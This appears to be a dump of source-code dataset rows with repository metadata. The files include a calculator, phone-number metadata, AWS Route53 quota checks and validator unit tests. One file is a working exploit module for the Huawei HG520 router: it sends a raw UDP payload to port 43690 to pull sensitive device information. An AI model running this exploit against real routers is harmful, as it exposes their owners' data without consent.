| 38.955224 | 115 | 0.570402 | 1,129 | 10,440 | 5.028344 | 0.139061 | 0.029593 | 0.042276 | 0.056368 | 0.913158 | 0.895191 | 0.893606 | 0.869297 | 0.866126 | 0.820504 | 0 | 0.000879 | 0.346073 | 10,440 | 267 | 116 | 39.101124 | 0.830672 | 0.307471 | 0 | 0.710938 | 1 | 0 | 0.162523 | 0.05564 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039063 | false | 0 | 0.054688 | 0 | 0.148438 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
158a24054f88770dd496ad193cde6c3ae31c4208 | 37 | py | Python | catkin_ws/src/adafruit_drivers/include/Gyro_L3GD20/__init__.py | DiegoOrtegoP/Software | 4a07dd2dab29db910ca2e26848fa6b53b7ab00cd | [
"CC-BY-2.0"
] | 12 | 2016-04-14T12:21:46.000Z | 2021-06-18T07:51:40.000Z | catkin_ws/src/adafruit_drivers/include/Gyro_L3GD20/__init__.py | DiegoOrtegoP/Software | 4a07dd2dab29db910ca2e26848fa6b53b7ab00cd | [
"CC-BY-2.0"
] | 14 | 2017-03-03T23:33:05.000Z | 2018-04-03T18:07:53.000Z | catkin_ws/src/adafruit_drivers/include/Gyro_L3GD20/__init__.py | DiegoOrtegoP/Software | 4a07dd2dab29db910ca2e26848fa6b53b7ab00cd | [
"CC-BY-2.0"
] | 113 | 2016-05-03T06:11:42.000Z | 2019-06-01T14:37:38.000Z | from .Gyro_L3GD20 import Gyro_L3GD20
| 18.5 | 36 | 0.864865 | 6 | 37 | 5 | 0.666667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 0.108108 | 37 | 1 | 37 | 37 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
159dd60cef71d997c989b91d6ac4c02e31951520 | 2,675 | py | Python | Calculadora.py | alvarado0211-sys/Primeros-Proyectos | f45ba9875e83eb1790fb6fc6b393168cace7649b | [
"MIT"
] | 1 | 2021-03-05T14:32:05.000Z | 2021-03-05T14:32:05.000Z | Calculadora.py | alvarado0211-sys/Primeros-Proyectos | f45ba9875e83eb1790fb6fc6b393168cace7649b | [
"MIT"
] | null | null | null | Calculadora.py | alvarado0211-sys/Primeros-Proyectos | f45ba9875e83eb1790fb6fc6b393168cace7649b | [
"MIT"
] | null | null | null | import time
## Presento la calculadora y sus opciones
print("Bienvenido a su calculadora personal")
print("1 - SUMA\n2 - RESTA\n3 - MUTLIPLICACION\n4 - DIVISION\n5 - SALIR DEL PROGRAMA")
print()
operacion=str(input("Ingrese el numero de la operacion deseada: "))
print()
while operacion<="5" and operacion>="1": ##abrimos el ciclo para que la calculadora se inicie luego de cada operacion
if operacion== "1": ##ingresando esta opcion sumamos cualquier numero
num1=float(input("Ingrese un numero: "))
num2=float(input("Ingrese un segundo numero: "))
time.sleep(0.2)
print()
print("El resultado de la suma es=",num1+num2)
print()
print("1 - SUMA\n2 - RESTA\n3 - MUTLIPLICACION\n4 - DIVISION\n5 - SALIR DEL PROGRAMA")
print()
operacion=str(input("Ingrese el numero de la operacion deseada: "))
elif operacion== "2": ##esta es la opcion para las restas
num1=float(input("Ingrese un numero: "))
num2=float(input("Ingrese un segundo numero: "))
time.sleep(0.2)
print()
print("El resultado de la resta es=",num1-num2)
print()
print("1 - SUMA\n2 - RESTA\n3 - MUTLIPLICACION\n4 - DIVISION\n5 - SALIR DEL PROGRAMA")
print()
operacion=str(input("Ingrese el numero de la operacion deseada: "))
elif operacion== "3": ## esta es la opcion para las multiplicaciones
num1=float(input("Ingrese un numero: "))
num2=float(input("Ingrese un segundo numero: "))
time.sleep(0.2)
print()
print("El resultado de la multiplicación es=",num1*num2)
print()
print("1 - SUMA\n2 - RESTA\n3 - MUTLIPLICACION\n4 - DIVISION\n5 - SALIR DEL PROGRAMA")
print()
operacion=str(input("Ingrese el numero de la operacion deseada: "))
elif operacion== "4": ## esta es la opcion para realizar divisiones
num1=float(input("Ingrese un numero: "))
num2=float(input("Ingrese un segundo numero: "))
time.sleep(0.2)
print()
print("El resultado de la division es=",num1/num2)
print()
print("1 - SUMA\n2 - RESTA\n3 - MUTLIPLICACION\n4 - DIVISION\n5 - SALIR DEL PROGRAMA")
print()
operacion=str(input("Ingrese el numero de la operacion deseada: "))
elif operacion== "5": ## esta opcion finaliza y cierra el programa
print("El programa ha finalizado")
time.sleep(0.5)
break ##fin del ciclo while
| 48.636364 | 137 | 0.584673 | 329 | 2,675 | 4.753799 | 0.227964 | 0.099744 | 0.086957 | 0.097187 | 0.745524 | 0.734015 | 0.707161 | 0.707161 | 0.707161 | 0.707161 | 0 | 0.031066 | 0.302056 | 2,675 | 54 | 138 | 49.537037 | 0.806642 | 0.127103 | 0 | 0.705882 | 0 | 0.098039 | 0.430654 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.019608 | 0 | 0.019608 | 0.490196 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
15bba02da25daa8220c7f8346d41e1756eed3894 | 521 | py | Python | python/phonenumbers/data/alt_format_358.py | rodgar-nvkz/python-phonenumbers | 4c7c4892211dbc9bc328bc3356b03853eaf993dc | [
"Apache-2.0"
] | 2,424 | 2015-01-05T05:34:45.000Z | 2022-03-28T22:37:53.000Z | python/phonenumbers/data/alt_format_358.py | rodgar-nvkz/python-phonenumbers | 4c7c4892211dbc9bc328bc3356b03853eaf993dc | [
"Apache-2.0"
] | 166 | 2015-01-30T23:59:18.000Z | 2022-03-14T21:08:42.000Z | Lib/site-packages/phonenumbers/data/alt_format_358.py | PsychedVic/Portafolio | 4bd59d19de41fbea5317d4f2b9e6219ea0359945 | [
"bzip2-1.0.6"
] | 345 | 2015-01-02T00:33:27.000Z | 2022-03-26T13:06:57.000Z | """Auto-generated file, do not edit by hand. 358 metadata"""
from ..phonemetadata import NumberFormat
PHONE_ALT_FORMAT_358 = [NumberFormat(pattern='(\\d)(\\d{3})(\\d{3,4})', format='\\1 \\2 \\3', leading_digits_pattern=['[2568][1-8]|3(?:0[1-9]|[1-9])|9']), NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{3,4})', format='\\1 \\2 \\3', leading_digits_pattern=['[12]0[1-9]|4|1[3-9]|29|50|7[15]']), NumberFormat(pattern='(\\d)(\\d{4})(\\d{3})', format='\\1 \\2 \\3', leading_digits_pattern=['[2568][1-8]|3(?:0[1-9]|[1-9])|9'])]
| 104.2 | 417 | 0.591171 | 95 | 521 | 3.147368 | 0.357895 | 0.033445 | 0.200669 | 0.090301 | 0.411371 | 0.411371 | 0.411371 | 0.411371 | 0.411371 | 0.411371 | 0 | 0.134694 | 0.059501 | 521 | 4 | 418 | 130.25 | 0.47551 | 0.103647 | 0 | 0 | 1 | 0.5 | 0.425163 | 0.353579 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
ec9d0f99cec288b4703a5082216ca420cd9d2ebe | 4,868 | py | Python | aws_quota/check/route53.py | yanbinren/aws-quota-checker | 582a440e21d5847550732c9cbd8425d3199457ef | [
"MIT"
] | 43 | 2021-02-25T00:53:24.000Z | 2022-02-25T17:38:24.000Z | aws_quota/check/route53.py | yanbinren/aws-quota-checker | 582a440e21d5847550732c9cbd8425d3199457ef | [
"MIT"
] | 25 | 2021-02-24T22:47:29.000Z | 2022-02-14T21:04:26.000Z | aws_quota/check/route53.py | yanbinren/aws-quota-checker | 582a440e21d5847550732c9cbd8425d3199457ef | [
"MIT"
] | 9 | 2021-02-26T21:01:33.000Z | 2022-01-18T08:25:33.000Z | from aws_quota.exceptions import InstanceWithIdentifierNotFound
import typing
import boto3
from .quota_check import InstanceQuotaCheck, QuotaCheck, QuotaScope
class HostedZoneCountCheck(QuotaCheck):
key = "route53_hosted_zone_count"
description = "Route53 Hosted Zones per Account"
scope = QuotaScope.ACCOUNT
@property
def maximum(self):
return self.boto_session.client('route53').get_account_limit(Type='MAX_HOSTED_ZONES_BY_OWNER')['Limit']['Value']
@property
def current(self):
return self.boto_session.client('route53').get_account_limit(Type='MAX_HOSTED_ZONES_BY_OWNER')['Count']
class HealthCheckCountCheck(QuotaCheck):
key = "route53_health_check_count"
description = "Route53 Health Checks per Account"
scope = QuotaScope.ACCOUNT
@property
def maximum(self):
return self.boto_session.client('route53').get_account_limit(Type='MAX_HEALTH_CHECKS_BY_OWNER')['Limit']['Value']
@property
def current(self):
return self.boto_session.client('route53').get_account_limit(Type='MAX_HEALTH_CHECKS_BY_OWNER')['Count']
class ReusableDelegationSetCountCheck(QuotaCheck):
key = "route53_reusable_delegation_set_count"
description = "Route53 Reusable Delegation Sets per Account"
scope = QuotaScope.ACCOUNT
@property
def maximum(self):
return self.boto_session.client('route53').get_account_limit(Type='MAX_REUSABLE_DELEGATION_SETS_BY_OWNER')['Limit']['Value']
@property
def current(self):
return self.boto_session.client('route53').get_account_limit(Type='MAX_REUSABLE_DELEGATION_SETS_BY_OWNER')['Count']
class TrafficPolicyCountCheck(QuotaCheck):
key = "route53_traffic_policy_count"
description = "Route53 Traffic Policies per Account"
scope = QuotaScope.ACCOUNT
@property
def maximum(self):
return self.boto_session.client('route53').get_account_limit(Type='MAX_TRAFFIC_POLICIES_BY_OWNER')['Limit']['Value']
@property
def current(self):
return self.boto_session.client('route53').get_account_limit(Type='MAX_TRAFFIC_POLICIES_BY_OWNER')['Count']
class TrafficPolicyInstanceCountCheck(QuotaCheck):
key = "route53_traffic_policy_instance_count"
description = "Route53 Traffic Policy Instances per Account"
scope = QuotaScope.ACCOUNT
@property
def maximum(self):
return self.boto_session.client('route53').get_account_limit(Type='MAX_TRAFFIC_POLICY_INSTANCES_BY_OWNER')['Limit']['Value']
@property
def current(self):
return self.boto_session.client('route53').get_account_limit(Type='MAX_TRAFFIC_POLICY_INSTANCES_BY_OWNER')['Count']
class RecordsPerHostedZoneCheck(InstanceQuotaCheck):
key = "route53_records_per_hosted_zone"
description = "Records per Route53 Hosted Zone"
instance_id = 'Hosted Zone ID'
@staticmethod
def get_all_identifiers(session: boto3.Session) -> typing.List[str]:
return [zone['Id'] for zone in session.client('route53').list_hosted_zones()['HostedZones']]
@property
def maximum(self):
try:
return self.boto_session.client('route53').get_hosted_zone_limit(Type='MAX_RRSETS_BY_ZONE', HostedZoneId=self.instance_id)['Limit']['Value']
except self.boto_session.client('route53').exceptions.NoSuchHostedZone as e:
raise InstanceWithIdentifierNotFound(self) from e
@property
def current(self):
try:
return self.boto_session.client('route53').get_hosted_zone_limit(Type='MAX_RRSETS_BY_ZONE', HostedZoneId=self.instance_id)['Count']
except self.boto_session.client('route53').exceptions.NoSuchHostedZone as e:
raise InstanceWithIdentifierNotFound(self) from e
class AssociatedVpcHostedZoneCheck(InstanceQuotaCheck):
key = "route53_vpcs_per_hosted_zone"
description = "Associated VPCs per Route53 Hosted Zone"
instance_id = 'Hosted Zone ID'
@staticmethod
def get_all_identifiers(session: boto3.Session) -> typing.List[str]:
return [zone['Id'] for zone in session.client('route53').list_hosted_zones()['HostedZones'] if zone['Config']['PrivateZone']]
@property
def maximum(self):
try:
return self.boto_session.client('route53').get_hosted_zone_limit(Type='MAX_VPCS_ASSOCIATED_BY_ZONE', HostedZoneId=self.instance_id)['Limit']['Value']
except self.boto_session.client('route53').exceptions.NoSuchHostedZone as e:
raise InstanceWithIdentifierNotFound(self) from e
@property
def current(self):
try:
return self.boto_session.client('route53').get_hosted_zone_limit(Type='MAX_VPCS_ASSOCIATED_BY_ZONE', HostedZoneId=self.instance_id)['Count']
except self.boto_session.client('route53').exceptions.NoSuchHostedZone as e:
raise InstanceWithIdentifierNotFound(self) from e
| 39.577236 | 161 | 0.737675 | 572 | 4,868 | 6.017483 | 0.13986 | 0.075537 | 0.116212 | 0.10982 | 0.754794 | 0.735619 | 0.735619 | 0.735619 | 0.735619 | 0.735619 | 0 | 0.017283 | 0.156122 | 4,868 | 122 | 162 | 39.901639 | 0.820594 | 0 | 0 | 0.554348 | 0 | 0 | 0.243426 | 0.117913 | 0 | 0 | 0 | 0 | 0 | 1 | 0.173913 | false | 0 | 0.043478 | 0.130435 | 0.695652 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
ecc0a4b5581ed06a8d3a861f59de2f95f92baf7f | 6,393 | py | Python | maza/modules/exploits/routers/huawei/hg520_info_disclosure.py | ArturSpirin/maza | 56ae6325c08bcedd22c57b9fe11b58f1b38314ca | [
"MIT"
] | 2 | 2020-02-06T20:24:31.000Z | 2022-03-08T19:07:16.000Z | maza/modules/exploits/routers/huawei/hg520_info_disclosure.py | ArturSpirin/maza | 56ae6325c08bcedd22c57b9fe11b58f1b38314ca | [
"MIT"
] | null | null | null | maza/modules/exploits/routers/huawei/hg520_info_disclosure.py | ArturSpirin/maza | 56ae6325c08bcedd22c57b9fe11b58f1b38314ca | [
"MIT"
] | null | null | null | from maza.core.exploit import *
from maza.core.udp.udp_client import UDPClient
class Exploit(UDPClient):
__info__ = {
"name": "Huawei HG520 Information Disclosure",
"description": "Module exploits Huawei EchoLife HG520 information disclosure vulnerablity. "
"If the target is vulnerable it is possible to retrieve sensitive information.",
"authors": (
"hkm", # vulnerablity discovery
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
"references": (
"https://www.exploit-db.com/exploits/12298/",
),
"devices": (
"Huawei HG520",
),
}
target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(43690, "Target port")
def __init__(self):
self.payload = (
b"\x00\x01\x00\x00\x0e\x00\xeb\x03\x7f\x0a\x5f\x00\x10\x00\x02\x00\x13\x00\x00\x00\x50\x02\x00\x00\xe0\xf4\x12\x00\xb0\xaa\x19\x00"
b"\x18\x87\x15\x00\x84\xfb\x12\x00\x00\x00\x00\x00\x78\x76\x4b\x02\xa8\x87\xec\x01\x00\x00\x00\x00\x38\x12\x19\x00\x10\xf5\x12\x00"
b"\x32\x00\x00\x00\x34\x60\x5d\x77\x00\x00\x00\x00\x84\xfb\x12\x00\x01\x00\x00\x00\xb8\x88\x24\x00\xf8\x8f\x19\x00\x0d\x00\x00\x00"
b"\x18\x94\x19\x00\xf8\x98\x19\x00\x74\xf4\x12\x00\x84\xf6\x12\x00\x4c\xf7\x12\x00\x00\xe9\x91\x7c\x10\x6f\x94\x7c\x00\x00\xff\xff"
b"\xae\x2c\x92\x7c\xe4\x2c\x92\x7c\x51\x2d\x92\x7c\x58\x2d\x92\x7c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\xf7\x12\x00"
b"\x44\xf5\x12\x00\xb0\x65\x92\x7c\xf8\xf7\x12\x00\x00\xe9\x91\x7c\x60\x2d\x92\x7c\xff\xff\xff\xff\x58\x2d\x92\x7c\x12\x66\x92\x7c"
b"\x01\x00\x00\x00\x76\x02\x48\x0d\xee\x64\x92\x7c\x00\x00\x00\x00\x9c\x70\x40\x00\x00\x00\x00\x00\x34\x60\x5d\x77\x30\x28\x1f\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x70\x2f\x15\x00\x78\x01\x15\x00\x00\x00\x00\x00\x78\x2f\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x54\xf8\x12\x00\xa8\x87\xec\x01\x50\xf8\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x76\x02\x48\x0d\x00\x00\x08\x02"
b"\xe4\xf5\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\xf8\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x5c\xf6\x12\x00\x0d\x00\x00\x00\xa2\x6f\x94\x7c\xf8\x98\x19\x00\x78\x76\x4b\x02\xd8\x93\x19\x00"
b"\x60\x90\x19\x00\x0d\x00\x00\x00\xf8\x8f\x19\x00\x84\xfb\x12\x00\x28\xf6\x12\x00\x30\xd4\x4c\x77\x48\xf7\x12\x00\x00\xe9\x91\x7c"
b"\x94\xf6\x12\x00\x94\xf6\x12\x00\xd8\x93\x19\x00\xec\x73\x94\x7c\x70\xe3\x4b\x02\x00\x00\x00\x00\x00\x00\x15\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x0f\x00\x41\x00\x13\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\xf8\x98\x19\x00\xb4\xf9\x12\x00\xf8\x8f\x19\x00"
b"\x58\xf7\x12\x00\x3d\x00\x92\x7c\xf6\x89\xec\x01\x00\x00\x00\x00\xe8\x06\x02\x00\x54\xfc\x12\x00\x01\x00\x00\x00\x01\x00\x00\x00"
b"\x00\x00\x00\x00\x12\xe1\xf8\x09\x7d\x0b\x00\x00\x72\xab\x56\x48\x3f\xe1\xbe\x07\x15\x04\x92\x7c\x1e\x04\x92\x7c\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\xe0\xfd\x7f\xeb\x50\xd7\xc6\x1a\x00\x00\x00\x00\xe0\xfd\x7f\x00\x10\x91\x7c\x00\x00\x00\x00\x00\x00\x01\x00"
b"\x00\xe0\xfd\x7f\x5c\xf7\x12\x00\xe6\x45\x92\x7c\x40\x04\x92\x7c\x00\xd6\x98\x7c\x48\xf7\x12\x00\x40\x12\x19\x00\x8a\x74\x94\x7c"
b"\x2c\xf7\x12\x00\xa8\x87\xec\x01\x00\x00\x00\x00\x00\x00\x15\x00\x0e\x00\xeb\x03\x80\x0a\x5f\x00\x64\x46\x00\x10\xfe\xf7\x12\x00"
b"\xb0\x44\x00\x10\x04\x00\x00\x00\x8c\xf7\x12\x00\xd3\x7e\x92\x7c\xfe\xf7\x12\x00\x31\x00\x00\x00\x00\x00\x00\x10\xa0\x45\x00\x10"
b"\x64\x46\x00\x10\x00\x00\x00\x00\x01\x00\x00\x00\xfc\xf7\x12\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x10\xe0\x00\x00\x10"
b"\x64\xf7\x12\x00\x01\x00\x00\x00\x9c\xf7\x12\x00\x65\x03\x92\x7c\x00\x00\x00\x10\x00\x00\x00\x00\x58\xf8\x12\x00\x9a\x7d\x92\x7c"
b"\x00\x00\x00\x10\xfe\xf7\x12\x00\xf8\xf7\x12\x00\xf8\xf7\x12\x00\xfe\xf7\x12\x00\x3f\x7e\x92\x7c\x78\xb1\x98\x7c\xe9\x7d\x92\x7c"
b"\x8c\x70\x40\x00\x9c\x70\x40\x00\xff\xff\x00\x00\x00\xd0\xfd\x7f\xe0\x47\x25\x00\x08\xe4\x80\x7c\xb0\x44\x00\x10\x6c\xe4\x80\x7c"
b"\xf0\x47\x25\x00\xa8\xf8\x12\x00\x00\x00\x00\x10\x00\x00\x00\x00\xfc\xf7\x12\x00\xfc\xf7\x12\x00\x00\x00\x00\x00\xfe\x04\x00\x00"
b"\xd0\x41\x25\x00\x00\x1b\x00\x10\x00\x00\x67\x65\x74\x41\x64\x73\x6c\x53\x74\x61\x74\x75\x73\x00\x3d\x00\x92\x7c\xea\x1b\x80\x7c"
b"\x00\x00\x15\x00\x00\x00\x00\x00\xfa\x1b\x80\x7c\x64\x5d\x47\x00\x9c\x70\x40\x00\x9f\xac\x80\x7c\x4e\x02\x50\x02\xa8\x87\xec\x01"
b"\x16\x00\x18\x00\x00\xdc\xfd\x7f\xef\xfa\x00\x00\xb4\xf7\x12\x00\xa8\x87\xec\x01\xa8\xf9\x12\x00\x00\xe9\x91\x7c\xf0\x7d\x92\x7c"
b"\xff\xff\xff\xff\xe9\x7d\x92\x7c\xa0\x7e\x92\x7c\x00\x00\x00\x10\x94\xf8\x12\x00\x00\x00\x00\x00\xa8\xf8\x12\x00\x01\x00\x00\x00"
b"\x9c\xf8\x12\x00\x6e\xae\x80\x7c\x9c\xf8\x12\x00\x80\xae\x80\x7c\x00\x00\x00\x10\x00\x00\x00\x00\x64\x5d\x47\x00\x9f\xac\x80\x7c"
b"\x0d\x00\x0e\x00\x8c\x70\x40\x00\xc4\xf8\x12\x00\xd8\xa0\x00\x66\x00\x00\x00\x10\x00\x1b\x00\x10\x84\xfb\x12\x00\x54\xfc\x12\x00"
b"\x01\x00\x00\x00\x68\xf8\x16\x00\xdc\xf8\x12\x00\x44\x4a\x0f\x77\xf4\xf8\x12\x00\x3b\xa0\x00\x66\x9c\x70\x40\x00\x01\x00\x00\x00"
b"\xec\xf8\x12\x00\xf0\xf8\x12\x00\xe8\xf8\x12\x00\x84\xfb\x12\x00\x54\xfc\x12\x00\x84\xfb\x12\x00\x00\x1b\x00\x10\x00\x00\x00\x00"
b"\xb8\xf9\x12\x00\xcb\x70\x40\x00\x9c\x70\x40\x00"
)
self.content = ""
def run(self):
if self.check():
print_status("Target returned data")
print_info(self.content)
else:
print_error("Exploit failed - device seems to be not vulnerable")
@mute
def check(self):
udp_client = self.udp_create()
udp_client.send(self.payload)
response = udp_client.recv(1024)
udp_client.close()
if response:
self.content = response
return True # target is vulnerable
return False # target is not vulnerable
| 75.211765 | 143 | 0.651494 | 1,284 | 6,393 | 3.23053 | 0.176791 | 0.383317 | 0.403568 | 0.358727 | 0.451302 | 0.371022 | 0.288091 | 0.178881 | 0.128014 | 0.101977 | 0 | 0.338262 | 0.143125 | 6,393 | 84 | 144 | 76.107143 | 0.418949 | 0.013765 | 0 | 0.04 | 0 | 0.466667 | 0.766032 | 0.702063 | 0 | 1 | 0 | 0 | 0 | 1 | 0.04 | false | 0 | 0.026667 | 0 | 0.146667 | 0.04 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
ece0cecc8cbe57e2b163aea0d6f05a998776b2b5 | 7,166 | py | Python | tests/unit/dataactvalidator/test_c23_award_financial_2.py | COEJKnight/one | 6a5f8cd9468ab368019eb2597821b7837f74d9e2 | [
"CC0-1.0"
] | 1 | 2018-10-29T12:54:44.000Z | 2018-10-29T12:54:44.000Z | tests/unit/dataactvalidator/test_c23_award_financial_2.py | COEJKnight/one | 6a5f8cd9468ab368019eb2597821b7837f74d9e2 | [
"CC0-1.0"
] | null | null | null | tests/unit/dataactvalidator/test_c23_award_financial_2.py | COEJKnight/one | 6a5f8cd9468ab368019eb2597821b7837f74d9e2 | [
"CC0-1.0"
] | null | null | null | from random import choice
from string import ascii_uppercase, ascii_lowercase, digits
from tests.unit.dataactcore.factories.staging import AwardFinancialFactory, AwardProcurementFactory
from tests.unit.dataactvalidator.utils import number_of_errors, query_columns
_FILE = 'c23_award_financial_2'
def test_column_headers(database):
expected_subset = {"row_number", "transaction_obligated_amou_sum", "federal_action_obligation_sum"}
actual = set(query_columns(_FILE, database))
assert expected_subset <= actual
def test_success(database):
""" Test that a four digit object class with no flag is a success, and a three digit object class with
a flag is a success. Only finds rows with matching piid AND parent_award_id from AwardFinancialFactory and
doesn't care about rows with null parent_award_id in AwardFinancialFactory """
# Create a 12 character random parent_award_id
parent_award_id = ''.join(choice(ascii_uppercase + ascii_lowercase + digits) for _ in range(12))
parent_award_id_two = ''.join(choice(ascii_uppercase + ascii_lowercase + digits) for _ in range(12))
parent_award_id_three = ''.join(choice(ascii_uppercase + ascii_lowercase + digits) for _ in range(12))
first_parent_award_id_row_one = AwardFinancialFactory(transaction_obligated_amou=1100, piid="1234",
parent_award_id=parent_award_id,
allocation_transfer_agency=None)
first_parent_award_id_row_two = AwardFinancialFactory(transaction_obligated_amou=11, piid="1234",
parent_award_id=parent_award_id,
allocation_transfer_agency=None)
first_parent_award_id_row_three = AwardFinancialFactory(transaction_obligated_amou=11, piid=None,
parent_award_id=parent_award_id,
allocation_transfer_agency=None)
first_parent_award_id_row_four = AwardFinancialFactory(transaction_obligated_amou=11, piid='',
parent_award_id=parent_award_id,
allocation_transfer_agency=None)
# And add a row for a different parent_award_id
second_parent_award_id_row_one = AwardFinancialFactory(transaction_obligated_amou=9999, piid="1234",
parent_award_id=parent_award_id_two,
allocation_transfer_agency=None)
third_parent_award_id_row_one = AwardFinancialFactory(transaction_obligated_amou=8888, piid="1234",
parent_award_id=parent_award_id_three,
allocation_transfer_agency=123)
first_ap_row = AwardProcurementFactory(parent_award_id=parent_award_id, piid="1234",
federal_action_obligation=-1100)
second_ap_row = AwardProcurementFactory(parent_award_id=parent_award_id, piid="1234", federal_action_obligation=-10)
third_ap_row = AwardProcurementFactory(parent_award_id=parent_award_id, piid="1234", federal_action_obligation=-1)
other_parent_award_id_ap_row = AwardProcurementFactory(parent_award_id=parent_award_id_two, piid="1234",
federal_action_obligation=-9999)
third_parent_award_id_ap_row = AwardProcurementFactory(parent_award_id=parent_award_id_three, piid="1234",
federal_action_obligation=-9999)
errors = number_of_errors(_FILE, database, models=[first_parent_award_id_row_one, first_parent_award_id_row_two,
first_parent_award_id_row_three, first_parent_award_id_row_four,
second_parent_award_id_row_one, first_ap_row, second_ap_row,
third_ap_row, other_parent_award_id_ap_row,
third_parent_award_id_row_one, third_parent_award_id_ap_row])
assert errors == 0
def test_failure(database):
""" Test that a three digit object class with no flag is an error. Only finds rows with matching piid AND
parent_award_id from AwardFinancialFactory and doesn't care about rows with null parent_award_id in
AwardFinancialFactory """
# Create a 12 character random parent_award_id
parent_award_id = ''.join(choice(ascii_uppercase + ascii_lowercase + digits) for _ in range(12))
parent_award_id_two = ''.join(choice(ascii_uppercase + ascii_lowercase + digits) for _ in range(12))
first_parent_award_id_row_one = AwardFinancialFactory(transaction_obligated_amou=1100, piid="1234",
parent_award_id=parent_award_id,
allocation_transfer_agency=None)
first_parent_award_id_row_two = AwardFinancialFactory(transaction_obligated_amou=11, piid="1234",
parent_award_id=parent_award_id,
allocation_transfer_agency=None)
first_parent_award_id_row_three = AwardFinancialFactory(transaction_obligated_amou=11, piid="1234",
parent_award_id=None,
allocation_transfer_agency=None)
# And add a row that is wrong
second_parent_award_id_row_one = AwardFinancialFactory(transaction_obligated_amou=9999, piid="1234",
parent_award_id=parent_award_id_two,
allocation_transfer_agency=None)
first_ap_row = AwardProcurementFactory(parent_award_id=parent_award_id, piid="1234",
federal_action_obligation=-1100)
second_ap_row = AwardProcurementFactory(parent_award_id=parent_award_id, piid="1234", federal_action_obligation=-10)
third_ap_row = AwardProcurementFactory(parent_award_id="1234", piid="1234", federal_action_obligation=-10)
other_parent_award_id_ap_row = AwardProcurementFactory(parent_award_id=parent_award_id_two, piid="1234",
federal_action_obligation=-1111)
errors = number_of_errors(_FILE, database, models=[first_parent_award_id_row_one, first_parent_award_id_row_two,
first_parent_award_id_row_three, second_parent_award_id_row_one,
first_ap_row, second_ap_row, third_ap_row,
other_parent_award_id_ap_row])
assert errors == 2
| 77.053763 | 120 | 0.61736 | 766 | 7,166 | 5.302872 | 0.138381 | 0.200394 | 0.236829 | 0.078779 | 0.859921 | 0.851551 | 0.796652 | 0.770064 | 0.749877 | 0.734121 | 0 | 0.031439 | 0.329752 | 7,166 | 92 | 121 | 77.891304 | 0.814283 | 0.093637 | 0 | 0.549296 | 0 | 0 | 0.025128 | 0.012409 | 0 | 0 | 0 | 0 | 0.042254 | 1 | 0.042254 | false | 0 | 0.056338 | 0 | 0.098592 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ece95efebace60552d61055d0bc2a2a7699940a6 | 73,277 | py | Python | example/alarm_benchmark.py | shiruizhao/swift | 2026acce35f0717c7a3e9dc522ff1c69f8dc3227 | [
"BSD-4-Clause-UC",
"BSD-4-Clause"
